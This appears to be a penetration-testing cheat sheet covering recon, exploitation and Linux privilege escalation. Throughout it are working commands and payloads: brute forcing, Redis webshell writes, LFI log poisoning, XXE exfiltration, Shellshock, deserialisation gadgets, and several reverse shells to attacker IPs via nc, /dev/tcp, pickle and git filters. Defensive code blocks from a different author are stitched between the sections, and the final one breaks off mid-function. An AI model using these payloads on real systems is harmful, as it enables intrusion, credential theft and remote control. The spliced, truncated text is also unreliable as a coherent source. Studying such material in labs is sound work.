Target Machine Penetration Notes

A belated post

2020/10/28 21:19:49

Intelligence Gathering

Practical Penetration

Target Machine Penetration

Finding the IP

  • Given by the organiser (competitions)
  • netdiscover
  • Check host IPs on the router (bridged networking, requires router access)
  • Based on the VM IP range, visit each IP in a browser (only where a web service exists; not recommended)
  • nmap -sn -T5 192.168.0.1/24 | grep -B2 -E "(virtual|VMware)" (matches the VM's MAC address vendor)
  • arp-scan -l

Port scanning

  • nmap -p 1-65535 -sV -v -T5 -n 192.168.0.1
  • -Pn: Redis could not be found; missing that piece of information is painful at times

Web paths

  • dirb http://192.168.0.1/ -w
  • gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php -u http://192.168.0.1/

VHOST

wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://flight.htb" -H "Host: FUZZ.flight.htb" --hl 154

SMB information enumeration

Wordpress

  • Username: wpscan --url http://192.168.0.1/ -e u
  • Password: wpscan --url http://192.168.0.1/ --username --wordlist /usr/share/wordlists/rockyou.txt
  • Plugins: wpscan --url http://192.168.0.1/ --enumerate ap --plugins-detection aggressive
  • Themes: wpscan --url http://192.168.0.1/ --enumerate at --themes-detection aggressive

Exploitation

SSH weak passwords

hydra -V -I -f -t 64 -L user -P pass ssh://192.168.0.1:22

FTP anonymous login

ftp 192.168.0.1
anonymous
  • FTP Banner

SMB weak passwords

enum4linux 192.168.0.1
hydra -L user -P pass -I -e n smb://192.168.0.1
smbmap -H 192.168.0.1
smbclient //192.168.0.1/dir -U username

NFS share mounting

nmap -p 111 --script nfs* 192.168.0.1

apt-get install nfs-common
vim /etc/exports
/share1 *(sync,ro) 192.168.0.1(sync,rw)
systemctl restart rpcbind
systemctl restart nfs
showmount -e 192.168.0.1
Export list for 192.168.0.1:
/home/peter *
mkdir /mnt/share1
mount -t nfs 192.168.0.1:/home/peter /mnt/share1
cd /mnt/share1
ls

Web authentication

  • Generate a wordlist from page content: cewl http://192.168.31.39/websec -w pass
  • hydra-post-form: hydra -I -l contact@hacknos.com -P FuzzDicts-master/passwordDict/top6000.txt -vV -f 192.168.31.39 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong"
  • JWT: https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYSJ9.Xjc37g2j_pU5SFHYwoPSHWJDEmRVPtfHkbFfGPcn4W0
pip install pyjwt
python
>>> import jwt
>>> jwt.encode({'username': 'admin'}, '1Kun', algorithm='HS256')
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo'
  • HTTP Basic authentication
    • Use together with Burp's Intruder module
    • Wordlist generation script
    • .htaccess (Apache2)
    • .htpasswd (Apache2)
# test.py: emit every user:password pair in the base64 form used by the Authorization: Basic header
import base64

raw = [
    'Recon',
    'Web',
    'Home',
    'Service',
    'Blog',
    'hackNos',
    'TroubleShoot',
    'Security',
    'Recon Security',
    'Secure',
    'root',
    '5ecure',
    'admin',
    'Secure@hackNos',
    'Security@hackNos',
    '']
for i in raw:
    for j in raw:
        print(base64.b64encode((j + ':' + i).encode()).decode())
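The JWT entry above recovers a four-character HS256 secret by brute force. The following added example (not code from the original notes) shows the server-side counterpart: an HS256 verifier on the standard library only, which pins the algorithm (so an `alg: none` header is rejected), compares signatures in constant time, and rates the secret length. The function and variable names are this example's own; the token in the `__main__` block is generated locally rather than taken from the page.

```python
# Added example (not from the original notes): an HS256 JWT verifier built on
# the standard library only. It pins the algorithm server-side, rejects the
# "alg: none" and wrong-key cases, and rates the secret length, which is what
# made the 4-character secret above crackable. All names are this example's own.
import base64
import hashlib
import hmac
import json


def b64url_decode(segment):
    # JWT segments are base64url without '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def sign_hs256(payload, secret):
    """Build a compact JWT signed with HMAC-SHA256 (used here to make test tokens)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    signing_input = (header + "." + body).encode("ascii")
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return header + "." + body + "." + b64url_encode(sig)


def verify_hs256(token, secret):
    """Return the payload dict if token is a valid HS256 JWT under secret, else None.

    The verifier never trusts the header's alg field: anything other than HS256
    (including "none") is rejected before any signature check takes place.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, body_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        signature = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, (header_b64 + "." + body_b64).encode("ascii"), hashlib.sha256).digest()
    # Constant-time comparison so response timing does not leak signature bytes.
    if not hmac.compare_digest(expected, signature):
        return None
    try:
        return json.loads(b64url_decode(body_b64))
    except (ValueError, UnicodeDecodeError):
        return None


def secret_is_weak(secret, min_bytes=32):
    """HS256 secrets should carry at least 256 bits of randomness; short
    human-chosen strings fall to the dictionary attack shown above."""
    return len(secret) < min_bytes


if __name__ == "__main__":
    key = b"1Kun"  # the secret recovered in the notes above; far too short
    tok = sign_hs256({"username": "admin"}, key)
    print(tok)
    print("payload:", verify_hs256(tok, key), "weak secret:", secret_is_weak(key))
```

The verifier ignores the algorithm named in the token: a deployment that selects the verification routine from the untrusted header is what turns a strong secret into no secret at all.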

LDAP

nmap 192.168.0.1 -p 389 --script ldap-search --script-args 'ldap.username="cn=admin,dc=admin,dc=local",ldap.password=password'

Unauthenticated Redis

  • PHP
config set dir /var/www/html/
config set dbfilename shell.php
set webshell "<?php phpinfo(); ?>"
save
  • SSH
rm -rf ~/.ssh/id*
ssh-keygen -t rsa
(echo -e "\n\n";cat ~/.ssh/id_rsa.pub;echo -e "\n\n") > new.txt
redis-cli -h 192.168.0.1 flushall
cat new.txt | redis-cli -h 192.168.0.1 -x set crackit
redis-cli -h 192.168.0.1 config set dir /var/lib/redis/.ssh/
redis-cli -h 192.168.0.1 config set dbfilename "authorized_keys"
redis-cli -h 192.168.0.1 save
ssh -i /root/.ssh/id_rsa redis@192.168.0.1
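Both Redis tricks above depend on the same server state: reachable from the network, no password, and `CONFIG SET dir`/`dbfilename` still available. The following added example (not code from the original notes) audits a `redis.conf` for exactly those settings; the two sample configs and all function names are constructed for this example.

```python
# Added example (not from the original notes): audit a redis.conf for the
# exposure settings that make the unauthenticated write-a-file tricks above
# possible. Both configs below are constructed for the example.
EXPOSED_CONF = """\
# constructed sample: the state the notes above rely on
bind 0.0.0.0
protected-mode no
port 6379
# requirepass changeme
dir /var/lib/redis
"""

HARDENED_CONF = """\
# constructed sample: the same server after hardening
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass "0ZIp0YzNaoFv2PcUuQ0uEqhbNwwVtZ5lExampleOnly"
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""


def parse_redis_conf(text):
    """Return (settings, renamed): directive -> value for active lines (last one
    wins) and original -> new name for every rename-command line."""
    settings, renamed = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        key, value = key.lower(), value.strip()
        if key == "rename-command":
            original, _, new_name = value.partition(" ")
            renamed[original.upper()] = new_name.strip().strip('"')
        else:
            settings[key] = value.strip('"')
    return settings, renamed


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the checks fired."""
    settings, renamed = parse_redis_conf(text)
    findings = []
    addresses = settings.get("bind", "").split()
    # Redis with no bind line (or a wildcard) accepts connections on every interface.
    if not addresses or any(a in ("0.0.0.0", "*", "::", "-::*") for a in addresses):
        findings.append("bind: listening on all interfaces")
    if settings.get("protected-mode", "yes").lower() == "no":
        findings.append("protected-mode: disabled")
    if not settings.get("requirepass"):
        findings.append("requirepass: unset, so anyone who can connect is fully authenticated")
    # CONFIG SET dir/dbfilename is the primitive behind both payloads above;
    # renaming the command to "" removes it for network clients.
    if renamed.get("CONFIG") != "":
        findings.append("CONFIG command: still reachable (not renamed/disabled)")
    return findings


if __name__ == "__main__":
    for name, conf in (("exposed", EXPOSED_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ["ok"])
```

The `dir` directive is left to a filesystem check outside this script: the write only becomes code execution when the Redis user can write into a web root or a `.ssh` directory, so the data directory and the service account's permissions are the second half of the audit.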

File Inclusion

  • LFI
file:///etc/passwd
php://filter/convert.base64-encode/resource=/etc/passwd
  • RFI
data:text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
http://192.168.0.2/bfl
  • SMTP
telnet 192.168.0.1 25
MAIL FROM: <Hacker>
RCPT TO: Username
data
<?php system($_GET['pass']); ?>
.
quit
~~~~~
/index.php?file=/var/mail/Username&pass=nc -e /bin/bash 192.168.0.2 8081
  • SSH
ssh '<?php system($_GET['pass']); ?>'@192.168.0.1
file.php?file=../../../var/log/auth.log&pass=ls
  • PHP Filter Chain

https://github.com/synacktiv/php_filter_chain_generator

XXE

LFI

<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file://../../../../../../etc/passwd"> %xxe; ]>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> %xxe; ]>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=../../../../../../etc/passwd"> %xxe; ]>

SSRF

<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://10.10.*.*/BFL"> %xxe; ]>

LFI+SSRF

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.*.*/bfl.dtd"> %xxe;]>

# /tmp/bfl.dtd
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=index.php">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://10.10.*.*/?BFL=%file;'>">
%eval;
%exfiltrate;
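Every XXE payload above, whether it reads a file, reaches out to a URL, or does both through an external DTD, needs the parser to accept a DOCTYP with entity declarations. The following added example (not code from the original notes) is a pre-parse gate that refuses such documents outright and labels what a rejected one resembled, which is useful for alerting. The sample documents and function names are constructed for this example; the payload shapes mirror the entries above.

```python
# Added example (not from the original notes): a pre-parse gate that refuses
# XML carrying any DOCTYPE or ENTITY declaration, which blocks every payload
# listed above before a parser sees it, plus a coarse classifier for alerting.
# The sample documents are constructed test inputs.
import re
import xml.etree.ElementTree as ET

DTD_RE = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)
# Captures the URL scheme after SYSTEM ("file:", "php:", "http:" ...).
SYSTEM_RE = re.compile(r"SYSTEM\s*[\"']([a-z][a-z0-9+.-]*:)", re.IGNORECASE)


def dtd_present(doc):
    """True if the document declares a DTD or an entity anywhere."""
    return DTD_RE.search(doc) is not None


def is_safe_to_parse(doc):
    return not dtd_present(doc)


def classify_xxe(doc):
    """Rough label for what a rejected document was trying to do."""
    if not dtd_present(doc):
        return "none"
    schemes = {m.group(1).lower() for m in SYSTEM_RE.finditer(doc)}
    if "php:" in schemes:
        return "lfi-php-filter"
    if "file:" in schemes:
        return "lfi-file"
    if schemes & {"http:", "https:"}:
        return "ssrf-or-oob"
    return "dtd-present"


def safe_parse(doc):
    """Parse XML only when it carries no DTD; raise ValueError otherwise."""
    if dtd_present(doc):
        raise ValueError("rejected XML with DTD (%s)" % classify_xxe(doc))
    return ET.fromstring(doc)


SAMPLES = {
    "lfi": '<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]><r/>',
    "filter": '<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> %xxe; ]><r/>',
    "ssrf": '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://10.10.0.1/bfl.dtd"> %xxe;]><r/>',
    "benign": '<order><item sku="42">2</item></order>',
}

if __name__ == "__main__":
    for name, doc in SAMPLES.items():
        try:
            root = safe_parse(doc)
            print(name, "parsed, root element:", root.tag)
        except ValueError as err:
            print(name, err)
```

The gate is a filter in front of the parser, not a replacement for configuring the parser itself: the parser's external-entity resolution should be disabled as well, so that a document slipping past the textual check still cannot fetch anything.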

Other

nc 192.168.0.1 21
site cpfr /etc/passwd
site cpto /var/www/html/passwd
~~~~~~
nc 192.168.0.1 21
site cpfr /proc/self/cmdline
site cpto /var/www/html/<?php passthru($_GET['cmd']);?>.php
site cpfr /var/www/html/<?php passthru($_GET['cmd']);?>.php
site cpto /var/www/html/shell.php
  • ShellShock

    • env x='() { :;}; echo vulnerable' bash -c "echo this is a test" (CVE-2014-6271)
    • env -i X=';() { (a)=>\' bash -c 'echo date'; cat echo (CVE-2014-7169)
    • /cgi-bin/* 200
    • curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.0.1/cgi-bin/
  • Ruby YAML.load() Deserialization

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "touch /tmp/hacked"
         method_id: :resolve
  • java
    • pom.xml

https://github.com/jeremylong/DependencyCheck

  • .NET JSON Deserialize

https://www.cnblogs.com/nice0e3/p/15294585.html
https://systemweakness.com/exploiting-json-serialization-in-net-core-694c111faa15

  • FastCGI

https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi

  • Prototype Pollution

https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce#pp2rce-via-env-vars-+-cmdline
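The ShellShock entries earlier in this section all deliver the payload through an HTTP header that a CGI handler exports into the environment, so the one thing they share is the `() {` prefix. The following added example (not code from the original notes) scans access-log lines for that prefix and records which header carried it and whether the request hit a CGI path. The log lines are constructed for the example and follow the Apache/Nginx combined format; the two payload strings are the `echo vulnerable` test strings from the entries above.

```python
# Added example (not from the original notes): scan web-server access logs for
# the "() {" function-definition prefix that every Shellshock payload above
# starts with. The log lines are constructed and follow the Apache/Nginx
# "combined" format; the payload strings are the test strings from above.
import re

# combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Bash treats an exported variable as a function definition when it begins
# with "() {"; the pattern tolerates the spacing variants seen in the wild.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

SAMPLE_LOG = [
    '10.0.0.5 - - [28/Oct/2020:21:19:49 +0800] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo vulnerable"',
    '10.0.0.6 - - [28/Oct/2020:21:20:01 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [28/Oct/2020:21:20:05 +0800] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :;}; echo vulnerable" "curl/7.64.0"',
    '10.0.0.8 - - [28/Oct/2020:21:20:09 +0800] "GET /about.html HTTP/1.1" 200 300 "-" "Mozilla/5.0 (X11; Linux x86_64) {}"',
]


def find_shellshock(lines):
    """Return one finding per suspicious line: which header carried the payload
    and whether the request targeted a CGI path (where it would execute)."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # unparsable line; a real pipeline would count these
        request = m.group("request")
        path = request.split(" ")[1] if " " in request else request
        for field in ("agent", "referer", "request"):
            if SHELLSHOCK_RE.search(m.group(field)):
                findings.append({
                    "ip": m.group("ip"),
                    "field": field,
                    "path": path,
                    "cgi_target": path.startswith("/cgi-bin/"),
                    "status": int(m.group("status")),
                })
                break
    return findings


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```

A 500 on a `/cgi-bin/` request with this pattern is the case to escalate first: it usually means the CGI script started, Bash parsed the header, and the injected command ran before the script produced output.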

Privilege Escalation

Capabilities

getcap -r / 2> /dev/null

Capability               Description
CAP_AUDIT_CONTROL        Enable and disable kernel auditing; change audit filter rules; retrieve audit status and filter rules
CAP_AUDIT_READ           Read the audit log via a multicast netlink socket
CAP_AUDIT_WRITE          Write records to the kernel audit log
CAP_BLOCK_SUSPEND        Use features that can block system suspend
CAP_CHOWN                Change file ownership
CAP_DAC_OVERRIDE         Bypass file DAC permission checks
CAP_DAC_READ_SEARCH      Bypass DAC checks on file reads and directory searches
CAP_FOWNER               Bypass the check that the file owner ID must match the process user ID
CAP_FSETID               Allowed to set the setuid bit on files
CAP_IPC_LOCK             Lock shared memory segments
CAP_IPC_OWNER            Bypass IPC ownership checks
CAP_KILL                 Send signals to processes not owned by the caller
CAP_LEASE                Modify the FL_LEASE flag on file locks
CAP_LINUX_IMMUTABLE      Modify the IMMUTABLE and APPEND file attribute flags
CAP_MAC_ADMIN            MAC configuration or state changes
CAP_MAC_OVERRIDE         Override MAC access restrictions
CAP_MKNOD                Use the mknod() system call
CAP_NET_ADMIN            Perform network administration tasks
CAP_NET_BIND_SERVICE     Bind to ports below 1024
CAP_NET_BROADCAST        Network broadcast and multicast access
CAP_NET_RAW              Use raw sockets
CAP_SETGID               Change the process GID
CAP_SETFCAP              Set arbitrary capabilities on files
CAP_SETPCAP              See the capabilities man page
CAP_SETUID               Change the process UID
CAP_SYS_ADMIN            Perform system administration tasks, such as mounting or unmounting filesystems and setting disk quotas
CAP_SYS_BOOT             Reboot the system
CAP_SYS_CHROOT           Use the chroot() system call
CAP_SYS_MODULE           Load and unload kernel modules
CAP_SYS_NICE             Raise priority and set the priority of other processes
CAP_SYS_PACCT            Perform BSD-style process accounting
CAP_SYS_PTRACE           Trace any process
CAP_SYS_RAWIO            Direct access to /dev/port, /dev/mem, /dev/kmem and raw block devices
CAP_SYS_RESOURCE         Override resource limits
CAP_SYS_TIME             Change the system clock
CAP_SYS_TTY_CONFIG       Configure TTY devices
CAP_SYSLOG               Use the syslog() system call
CAP_WAKE_ALARM           Trigger something that wakes the system (e.g. CLOCK_BOOTTIME_ALARM timers)
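Reading `getcap -r /` output by eye is slow, and the table above makes it clear that only a handful of capabilities (CAP_SETUID, CAP_SYS_ADMIN, CAP_DAC_READ_SEARCH and friends) are root-equivalent for whoever can run the binary. The following added example (not code from the original notes) parses both getcap output styles and sorts each binary into a risk tier. The sample output and the tiering are this example's own constructions.

```python
# Added example (not from the original notes): parse the output of
# `getcap -r /` and rank each binary by how close its capability set is to
# root. Both getcap output styles are handled (older "path = caps+ep" and
# newer "path caps=ep"). The sample output and the risk tiers are this
# example's own constructions.
import re

# Tier 1: effectively root (or arbitrary file read) for whoever can run the binary.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner",
    "cap_setfcap", "cap_sys_rawio",
}
# Tier 2: expected on a few specific tools (ping, tcpdump) but worth confirming.
NOTEWORTHY = {
    "cap_net_raw", "cap_net_admin", "cap_net_bind_service", "cap_sys_chroot",
    "cap_fsetid", "cap_kill",
}

GETCAP_LINE = re.compile(
    r"^(?P<path>\S+)\s*(?:=\s*)?(?P<caps>cap_[a-z_]+(?:,cap_[a-z_]+)*)(?P<flags>[+=][eip]+)$"
)

SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
/usr/bin/tar cap_dac_read_search=ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""


def parse_getcap(text):
    """Return a list of {path, caps, effective, permitted} dicts, one per line."""
    entries = []
    for raw in text.splitlines():
        m = GETCAP_LINE.match(raw.strip())
        if not m:
            continue
        flags = m.group("flags")[1:]
        entries.append({
            "path": m.group("path"),
            "caps": m.group("caps").split(","),
            "effective": "e" in flags,
            "permitted": "p" in flags,
        })
    return entries


def triage_getcap(text):
    """Map path -> (tier, capabilities that decided the tier)."""
    result = {}
    for entry in parse_getcap(text):
        caps = set(entry["caps"])
        root_caps = sorted(caps & ROOT_EQUIVALENT)
        note_caps = sorted(caps & NOTEWORTHY)
        if root_caps:
            tier = "root-equivalent"
        elif note_caps:
            tier = "review"
        else:
            tier = "low"
        result[entry["path"]] = (tier, root_caps or note_caps or sorted(caps))
    return result


if __name__ == "__main__":
    for path, (tier, caps) in triage_getcap(SAMPLE_GETCAP).items():
        print("%-16s %s  %s" % (tier, path, ",".join(caps)))
```

An interpreter (python, perl) or an archiver (tar) in the root-equivalent tier is the finding to act on: the capability is inherited by whatever the program is told to run or read, which is a much larger surface than the one the capability was granted for.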

Traffic capture

tcpdump -D
timeout 120 tcpdump -i interface -w cap.pcap
tcpdump -r cap.pcap

timeout 120 tshark -i interface

Shell

python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import os; os.system("/bin/bash")'
perl -e 'exec "/bin/bash";'
awk 'BEGIN {system("/bin/bash")}'
  • tty (send output to a terminal; check write permission on the tty first)
tty
/dev/pts/0
cat /etc/passwd > /dev/pts/0

Passwords

  • Password reuse
    • Web accounts
    • Web admin
    • SSH
    • FTP
    • MySQL
    • root
    • Redis
  • /etc/passwd & /etc/shadow
hashcat --help | grep Unix
hashcat -m 500 -a 0 -o found.txt crack.hash rockyou.txt

echo '$1$flag$vqjCxzjtRc7PofLYS2lWf/' > passwd
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long passwd
john --show passwd
  • unshadow
  • ssh
/usr/share/john/ssh2john.py id_rsa > ssh
john --wordlist=/usr/share/wordlists/rockyou.txt ssh
  • wordpress – $P$ – phpass

passwd/shadow prefix   Method              hashcat -m   john --format=
$1                     md5                 500          md5crypt-long
$2*                    bcrypt (Blowfish)   3200         bcrypt
$5                     sha256              7400         sha256crypt
$6                     sha512              1800         sha512crypt

Local service discovery

  • netstat
  • ss
  • lsof

UDF privilege escalation

  • Plugin path: show variables like 'plugin_dir';
  • File permissions: SHOW VARIABLES LIKE "secure_file_priv";
    • mysqld.conf: "secure_file_priv="
    • Empty value: no restriction
    • NULL: writing is not allowed
    • A path: writing is allowed only to that path (subdirectories excluded)
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/udf.so'));
select * from foo into dumpfile '%plugin_dir%/udf.so';
create function sys_eval returns string soname 'udf.so';
select sys_eval('id');

UDF files (dll/so)

Metasploit

/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_32.so
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.dll
/usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so

IDA can be used to see exactly which functions the library exports

  • sys_get
  • sys_exec
  • sys_eval
  • sys_set
  • sys_bineval

SQLMap

/usr/share/sqlmap/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
/usr/share/sqlmap/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
/usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
/usr/share/sqlmap/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_

Decode
python .\cloak.py -d -i ..\..\udf\mysql\linux\64\lib_mysqludf_sys.so_ -o linux_udf_64.so

Executing system commands from the MySQL client

  • system whoami
    (version >= 5.7)

SUDO & SUID

https://gtfobins.github.io/

When escalating through a shell script, arguments that contain spaces must be quoted

SUID: find / -user root -perm -4000 -print 2>/dev/null

sudo su
sudo -i
cat /etc/sudoers

List the programs that can be run via sudo
sudo -l

  • When the sudo-permitted command is restricted by its execution path, ../ can be used to bypass the restriction

  • doas

  • python: python -c 'import os;os.system("/bin/bash")'

    • input(): __import__('os').system('/bin/sh')
    • Write commands into a library file
    • pickle deserialisation
import pickle
import base64
import os


class RCE(object):
    def __reduce__(self):
        cmd = ('nc -e /bin/bash 192.168.0.1 8080')
        return os.system, (cmd,)


if __name__ == '__main__':
    print(base64.urlsafe_b64encode(pickle.dumps(RCE())))

import pickle
import urllib.parse


class payload(object):
    def __reduce__(self):
        return (eval, ("open('/flag.txt','r').read()",))


print(urllib.parse.quote(pickle.dumps(payload())))
  • php: php -r "system('/bin/bash');"
  • rpm: rpm --eval '%{lua:posix.exec("/bin/bash")}'
  • dpkg
gem install fpm
mkdir exp && cd exp
echo -e '#!/bin/bash\n/bin/bash' > exp.sh
fpm -s dir -t deb -n exp --before-install exp.sh ./
dpkg -i exp_1.0_amd64.deb
  • ruby: ruby -e 'exec "/bin/bash"'
  • gcc: gcc -wrapper /bin/bash,-s .
  • perl: perl -e 'exec "/bin/bash";'
  • java:
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

public class sudo {
    public static void main(String[] args) {
        ProcessBuilder processBuilder = new ProcessBuilder();
        processBuilder.command("/bin/bash", "-c", "whoami > whoami");
        try {
            Process process = processBuilder.start();
            BufferedReader reader =
                    new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }
            int exitCode = process.waitFor();
            System.out.println("\nExited with error code : " + exitCode);
        } catch (IOException e) {
            e.printStackTrace();
        } catch (InterruptedException e) {
            e.printStackTrace();
        }
    }
}
javac sudo.java
java sudo
  • mysql: mysql -e '\! /bin/bash'
  • nmap
    • 2.02 <= nmap -v <= 5.21
nmap --interactive
!sh
  • vim
    • view /etc/shadow
    • shell
vim
:set shell=/bin/bash
:shell
  • less
  • more
  • nano
  • cp
    • Overwrite passwd (vertical)
    • Write authorized_keys (horizontal)
    • --no-preserve=mode
  • mv
  • wget
  • find
    • find . -exec whoami \;
    • find . -exec /bin/bash -p \;
Read: ***
Write: **2
Execute: **4 (bash); 1**, *1*, **1 (exec)
  • bash
  • bash -p
  • awk
    • awk '/RE/{system("cat /tmp/1")}' /etc/passwd >> /etc/passwd
    • /tmp/1 holds the prepared account entry
    • RE matches the end of one particular line in passwd
  • tee: echo 1 | tee /etc/passwd
  • unzip
cat /etc/passwd > passwd
echo data >> passwd
zip new.zip passwd
unzip new.zip -d /etc/
  • git filter
    Git provides a filter mechanism that lets users apply custom scripts to files when they are checked out of, or committed to, a Git repository.
    The mechanism consists of two filter types: the clean filter and the smudge filter. The clean filter transforms a file's content before it is committed to the repository; the smudge filter transforms a file's content when it is checked out of the repository.
echo "python3 -c \"import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('0.0.0.0',9995));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);\"" > /tmp/BFL
chmod +x /tmp/BFL
git init
echo '*.php filter=indent' > /var/www/image/.git/info/attributes
git config filter.indent.clean /tmp/BFL
sudo -u svc /var/www/image/scripts/git-commit.sh
  • systemctl
[Service]
ExecStart=/bin/bash -c "bash -i >& /dev/tcp/10.10.*.*/9996 0>&1"

[Install]
WantedBy=multi-user.target

echo -n W1NlcnZpY2VdCkV4ZWNTdGFydD0vYmluL2Jhc2ggLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTYuMi85OTk2IDA+JjEiCgpbSW5zdGFsbF0KV2FudGVkQnk9bXVsdGktdXNlci50YXJnZXQ= | base64 -d > /etc/systemd/system/bufferfly.service

$PATH

  • The target file is a binary executable
  • You need to know which command the target executes
  • Use strings to inspect the executable's contents

echo

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /usr/bin
./shell
whoami

copy

cd /tmp
cp /bin/bash /tmp/ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /usr/bin
./shell
whoami

symlink

cd /tmp
ln -s /bin/bash ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /usr/bin
./shell
whoami
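All three variants above (echo, copy, symlink) rely on the same precondition: a directory the current user can write to is searched before the system directories, and the privileged program calls `ps` without an absolute path. The following added example (not code from the original notes) audits a PATH value for that condition. The decision logic is kept pure so it can be exercised on the constructed tuples below; `audit_path()` feeds it the live filesystem. All names are this example's own.

```python
# Added example (not from the original notes): audit a PATH value for the
# precondition all three variants above share, a directory that an
# unprivileged user can write to (or a relative entry) being searched before
# the system directories. judge_entries() is pure so it can run on the
# constructed tuples below; audit_path() feeds it the live filesystem.
import os
import stat


def judge_entries(entries):
    """entries: list of (entry, st_mode or None, is_dir). Returns [(entry, reason)]."""
    findings = []
    for entry, mode, is_dir in entries:
        if entry in ("", "."):
            findings.append((entry or "<empty>", "current directory is searched"))
        elif not os.path.isabs(entry):
            findings.append((entry, "relative entry"))
        elif mode is None or not is_dir:
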